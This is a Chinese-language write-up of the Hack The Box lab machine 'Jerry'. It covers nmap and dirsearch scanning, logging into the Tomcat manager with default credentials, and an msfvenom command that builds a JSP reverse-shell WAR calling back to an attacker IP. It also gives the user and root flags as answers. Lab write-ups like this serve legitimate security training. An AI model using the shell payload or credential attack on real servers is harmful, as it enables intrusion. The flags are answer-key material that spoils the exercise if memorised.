banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

htb靶场 - Jerry

#htb#靶场25
AI-generated summary
The document discusses the exploitation of the Jerry machine on Hack The Box, which simulates a scenario involving an exposed Apache Tomcat server. 1. **Port Scanning**: An Nmap scan reveals open ports on the target IP (10.10.10.95). 2. **Service Identification**: The server is identified as running Apache Tomcat. 3. **Web Application Manager Path**: The path to the Tomcat Web Application Manager is found to be `/manager/html` using directory scanning. 4. **Credentials**: The valid username and password for accessing the manager are `tomcat:s3cret`. 5. **Deployable File Type**: The server accepts WAR files for deployment. 6. **Shell Access**: A reverse shell is created using a WAR file, allowing access to the server. 7. **Flag Retrieval**: Two flags are obtained: a user flag (`7004dbcef0f854e0fb401875f26ebd00`) and a root flag (`04a8b36e1545a455393d067e772fe90e`). The document also mentions potential file reading vulnerabilities related to AJP.

Jerry#

Although Jerry is one of the easier machines on Hack The Box, it is realistic as Apache Tomcat is often found exposed and configured with common or weak credentials. 

ip 地址:10.10.10.95

task1 远程主机开放了什么端口。

通过 nmap 进行扫描,识别端口开发情况

nmap -sV 10.10.10.95

da4c3b5c921fd9a70671aa0b1b00f1db_MD5

task2 远程主机运行了什么服务?

由 nmap 扫描结果可以,是 Apache Tomcat

task3 Web 服务器上哪个相对路径通向 Web 应用程序管理器?

5478701084fbb552cbabd751812c92df_MD5

dirsearch -u http://10.10.10.95:8080/

测试后发现是 /manager/html,目录扫描就可以扫出来

task4 哪个有效的用户名和密码组合可用于认证进入 Tomcat Web 应用程序管理器?请以 username 的格式给出答案。

admin/admin 登录后

d3c8f4025796da09d722d91f845607d9_MD5

tomcat

39b52d9b28c7ba54ef37f2fced070be7_MD5

task5 什么类型的文件可以部署到服务器上?

当然是 war 包。

task 提交 user 的 flag

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=3155 -f war > shell.war 

5b8913f60909dda3532be9476d04c2f5_MD5

2f30b2facbf7dbad8655979755197b52_MD5

95d56514dd6a0987200fea815c4a05dd_MD5

点击 http://10.10.10.95:8080/shell/

反弹会 shell

b95a9f57e33b090d532c7968b6ce9bff_MD5

ce04826dbd941201445f1dd44d6a09c1_MD5

这种文件要怎么读取?

type *.txt

2a22782298cb0a82d00329420159c7e3_MD5

有两个 flag

user flag:7004dbcef0f854e0fb401875f26ebd00

task 提交 root 的 flag

04a8b36e1545a455393d067e772fe90e

http://10.10.10.95:8080/manager/status

以为有 ajp 任意文件读取呢

ea0715aea55735617cc9f44aaac072f2_MD5

216733999b175aa05288747da68eb80c_MD5

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.